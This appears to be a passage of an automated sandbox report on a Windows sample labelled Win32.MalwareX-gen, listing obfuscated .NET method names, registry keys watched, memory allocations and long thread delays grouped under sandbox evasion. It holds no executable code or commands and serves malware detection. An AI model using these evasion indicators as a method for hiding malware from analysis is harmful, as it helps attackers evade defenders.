          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Code function: 2_2_06587EFA push es; ret 2_2_06587F4C
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.bac0000.4.raw.unpack, multiple .cs files High entropy of concatenated method names
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, multiple .cs files High entropy of concatenated method names
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, YpOgcdvXpYEKdaKsxV.csHigh entropy of concatenated method names: 'IG1fRrYNds', 'eH7f9MUqT4', 'S1ufYaRHct', 'VVEYtjeVGn', 'JMsYzw5ixe', 'FfDfW8x1C9', 'NEhfPbfSXr', 'oKJfEJldnc', 'kmafcbHMws', 'WK3fmomkcW'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, FuZBunonvZSp1ve4RB.csHigh entropy of concatenated method names: 'kPafNDcApS', 'q0oflvAPxj', 'VPXfDFhhbt', 'bGtf8wbSc5', 'cMffG5Xw49', 'hSOfeURGiH', 'gBJfC4MaOH', 'KjLfLb0IYm', 'z5efIBlVWF', 'uumfSWRIYA'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, sCesRoL9fdy7v4Nm93.csHigh entropy of concatenated method names: 'fsZXKa0CcC', 'P5aXAw57Sq', 'Tb1XHuSTC9', 'bjRXrsoRPR', 'EH4XjL5Rse', 'DxkX39Li8h', 'CXhXi2abWx', 'QMRX0mF7i1', 'bxZX6hPnI0', 'yRZXtr4e2A'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, zXTubc3YQxbcSwuOcE.csHigh entropy of concatenated method names: 'cxVF0AnqgI', 'IsCFtxPpTT', 'FNPuWErgZf', 'UdUuPDZ44F', 'mPiFTqC01E', 'OpeFUBqlhy', 'xAvFZBL8A0', 'HxEFK5RR4A', 'yNtFAhlNpD', 'oAkFHVeByX'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, OkjaSkXV1k1G9Tl40W.csHigh entropy of concatenated method names: 'Dispose', 'OEBP6yAv7N', 'KyqEJoXH9J', 'hwFmMa5ANG', 'OisPtP94ns', 'WT2Pz4SuVT', 'ProcessDialogKey', 'MXmEWMT0J3', 'QgiEPXLqyn', 'HUkEEF2bp7'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, qNIhJMPP6B0Mjy4dN8o.csHigh entropy of concatenated method names: 'kW45thpJyc', 'oRX5z7xWQS', 'w1IbWPqX2S', 'iwgbPkpoP9', 'ARFbEqvT4v', 'BgjbcJga86', 'NNdbmK6T3F', 'gdybxOy5EQ', 'gTRbR5iNv9', 'CF2bXYCxJZ'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, D7ro6JKJLJp5QOZDAc.csHigh entropy of concatenated method names: 'VCRk45aEfV', 'CKRkUf4NLo', 'IwqkKu2WgX', 'v11kAcgnHF', 'PmDkJlhJZg', 'oNAkdgPdeV', 'x0Mk7RlBs7', 'GvEksJUxM2', 'NaIkBgpvxA', 'yu7kvy076T'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, rgk38OIEVEQ49sPsPw.csHigh entropy of concatenated method names: 'Xp298rQ57I', 'WCF9ew2xy1', 'TvZ9LhgGBh', 'CLP9I1Fjs1', 'VJO9k1PRnI', 'WRY9MaeXJA', 'rpL9F1EAaF', 'iyt9u3hlEW', 'X959nS83gj', 'KMJ95RKHwT'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, q2bp7LtAgBed0lPVlX.csHigh entropy of concatenated method names: 'xnf59a5EZj', 'pT05QiBRcP', 'pjp5YMFPxJ', 'jyP5fEygDR', 'qTI5nbAqg3', 'tua5wCqmcr', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, lciODPiccTEByAv7NT.csHigh entropy of concatenated method names: 'qGrnkBIAwu', 'uoSnFbR6ii', 'EHxnnYRXgX', 'NKMnbqx3ct', 'rUdnVpejkL', 'nbvngst2fR', 'Dispose', 'MSwuRd6X0D', 'RHeuX1f6kn', 'vrmu96jfSA'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, wlpCX9SpL7SJsG3Fbi.csHigh entropy of concatenated method names: 'HgWQGS1GxW', 'KP1QCm3KEq', 'rqg9da7Cnc', 'QVl97Nwc0h', 'LBr9spm2hU', 's249BAtnUc', 'NCw9vu3DUJ', 'hLx9qJmJ0Q', 'mYY9oEjT7J', 'lde940pNWQ'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, kHW4FbHrVn2AysCQ9a.csHigh entropy of concatenated method names: 'ToString', 'RuJMTRCwel', 'wOxMJxiMQD', 'XsRMdTRUyL', 'r7pM7H0SSj', 'lGwMsB6UmX', 'vXxMBswkcX', 'AlfMv8vPc7', 'f4vMqWu6W1', 'veAMoidOaX'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, CdQvh4O7Z6pfePBZT0.csHigh entropy of concatenated method names: 'FXFYxZ4L1N', 'MrnYXQ3V71', 'AheYQqW1c8', 'rUNYfdWKKU', 'bQYYwSxoyR', 'Fs5QjqBb0a', 'rsvQ3jJOHi', 'I7OQigVAKc', 'tSgQ06kyEe', 'wa7Q6ma0XA'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, ATAGlw9SUHwC2R98pA.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'FrVE6ThqiS', 'RkjEtjq38G', 'vQyEzDdxIw', 'byscW7UNnp', 'jYIcPghGPP', 'MTwcE33hha', 'PolccDG5Ek', 'JdQfijIvxLAaf7RXCE9'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, fyBtbXPWXOfVSu7ZrNH.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Hni5T8UYs5', 'Ioy5U62yPg', 'X4W5ZREAny', 'qkd5KA2DcR', 'zVl5ATlQNb', 'hmw5HlPlsp', 'HC55rUD6W3'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, Uuww7pzrU84TDjJpUY.csHigh entropy of concatenated method names: 'a0v5eSml9w', 'JKf5LHTe3L', 'fyN5IRPdWT', 'egC5OCQ8om', 'e1O5JVj9Z8', 'N7i57kyL4u', 'ynx5stYL8K', 'M1B5gCu968', 'eUi5NAjJib', 'Clt5l9KN8K'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, aIX1qIETMNK3xPX90S.csHigh entropy of concatenated method names: 'nH6DXtiL6', 'WRy8HFYvP', 'kNkeg8JH5', 'vowCbRxQ2', 's2QIEXIr4', 'bjQS9DxDj', 'zpB0rcuXEeIiQi7OFt', 'YvTTm3EOmOCHesxZ7L', 'dXuuWaxI0', 'sdK5Giegh'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, eUt9fLwjWkj1AUhmiI.csHigh entropy of concatenated method names: 'tGncxWU0s4', 'kVicRIhMrE', 'wEccX0ByvV', 'enEc9ALiC2', 'qptcQWokee', 'm0kcYWJ6o8', 'hOAcfYu2Pi', 'U4QcwK13EC', 'aowcpscaxp', 'ioMc2JTyJu'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, yR4vm3ZHQAhJYyhB1q.csHigh entropy of concatenated method names: 'i0ihLyPxkQ', 'AkZhIIpepd', 'O6fhOGosQg', 'MdqhJOZuxe', 'iKih75lf7u', 'TMyhsZ95gN', 'z13hvh9PHx', 'emwhqR7Y0g', 'qWoh42D30A', 'QBlhT4HU71'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, dMT0J36KgiXLqyndUk.csHigh entropy of concatenated method names: 'wDCnO7mkhF', 'SQ2nJDvVLY', 'zHDndIvagV', 'o0Nn7a3xHf', 'p11nsxbRHX', 'KRinB3jFBR', 'SpUnvYHqhj', 'a28nqwXnPy', 'e1anoPFi5y', 'fvEn4jALXD'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, s387lUPm2nPWXeDq5xs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oZQyn64gIV', 'l5ty5oGoPL', 'qZRybhqqQY', 'b4cyyTXWwq', 'k9ByVSRBm7', 'ycyy1tkHVF', 'trKygSEFud'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, ykPq5omwCQe1PnGFFW.csHigh entropy of concatenated method names: 'xSnPfCesRo', 'hfdPwy7v4N', 'FEVP2EQ49s', 'bsPPawglpC', 'B3FPkbiedQ', 'Lh4PM7Z6pf', 'V4CF4q9cGfKgjQj9qi', 'u4d1fPX9JDseSKX295', 'YMsc6O4xH1SMCcfnwb', 'qaCPPKwmon'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, YpOgcdvXpYEKdaKsxV.csHigh entropy of concatenated method names: 'IG1fRrYNds', 'eH7f9MUqT4', 'S1ufYaRHct', 'VVEYtjeVGn', 'JMsYzw5ixe', 'FfDfW8x1C9', 'NEhfPbfSXr', 'oKJfEJldnc', 'kmafcbHMws', 'WK3fmomkcW'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, FuZBunonvZSp1ve4RB.csHigh entropy of concatenated method names: 'kPafNDcApS', 'q0oflvAPxj', 'VPXfDFhhbt', 'bGtf8wbSc5', 'cMffG5Xw49', 'hSOfeURGiH', 'gBJfC4MaOH', 'KjLfLb0IYm', 'z5efIBlVWF', 'uumfSWRIYA'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, sCesRoL9fdy7v4Nm93.csHigh entropy of concatenated method names: 'fsZXKa0CcC', 'P5aXAw57Sq', 'Tb1XHuSTC9', 'bjRXrsoRPR', 'EH4XjL5Rse', 'DxkX39Li8h', 'CXhXi2abWx', 'QMRX0mF7i1', 'bxZX6hPnI0', 'yRZXtr4e2A'
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 2828, type: MEMORYSTR
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Memory allocated: 1330000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Memory allocated: 3020000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Memory allocated: 1590000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Memory allocated: 9430000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Memory allocated: 7D40000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Memory allocated: A430000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Memory allocated: B430000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Memory allocated: BB30000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Memory allocated: CB30000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Memory allocated: DB30000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Memory allocated: DD0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Memory allocated: 2760000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Memory allocated: 4860000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 240000
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 239874
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 239766
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 239641
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 239516
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 239405
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 239297
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 239188
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 239063
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 238938
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 238828
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 238716
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 238608
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 238500
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 238391
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 238200
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 600000
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 599874
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 599749
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 599641
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 599526
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 599406
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 599281
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 599109
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 598875
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 598718
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 598609
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 598500
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 598390
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 598281
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 598169
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 598047
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 597937
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 597824
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 597703
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Thread delayed: delay time: 597594
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597483Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597375Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597265Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597156Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597047Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596937Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596827Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596719Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596609Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596498Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596387Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596274Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596159Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596040Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595907Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595735Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595609Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595500Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595389Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595266Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595156Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595024Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594906Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594797Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594687Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594578Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594469Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594359Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594250Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594140Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594031Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 593922Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeWindow / User API: threadDelayed 1634Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeWindow / User API: threadDelayed 1110Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeWindow / User API: threadDelayed 3260Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeWindow / User API: threadDelayed 6570Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -13835058055282155s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -239874s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -239766s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -239641s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -239516s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -239405s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -239297s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -239188s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -239063s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -238938s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -238828s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -238716s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -238608s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5772Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -238500s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -238391s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -238200s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 1720Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep count: 38 > 30Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -35048813740048126s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7308Thread sleep count: 3260 > 30Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -599874s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7308Thread sleep count: 6570 > 30Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -599749s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -599641s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -599526s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -599406s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -599281s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -599109s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -598875s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -598718s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -598609s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -598500s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -598390s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -598281s >= -30000sJump to behavior
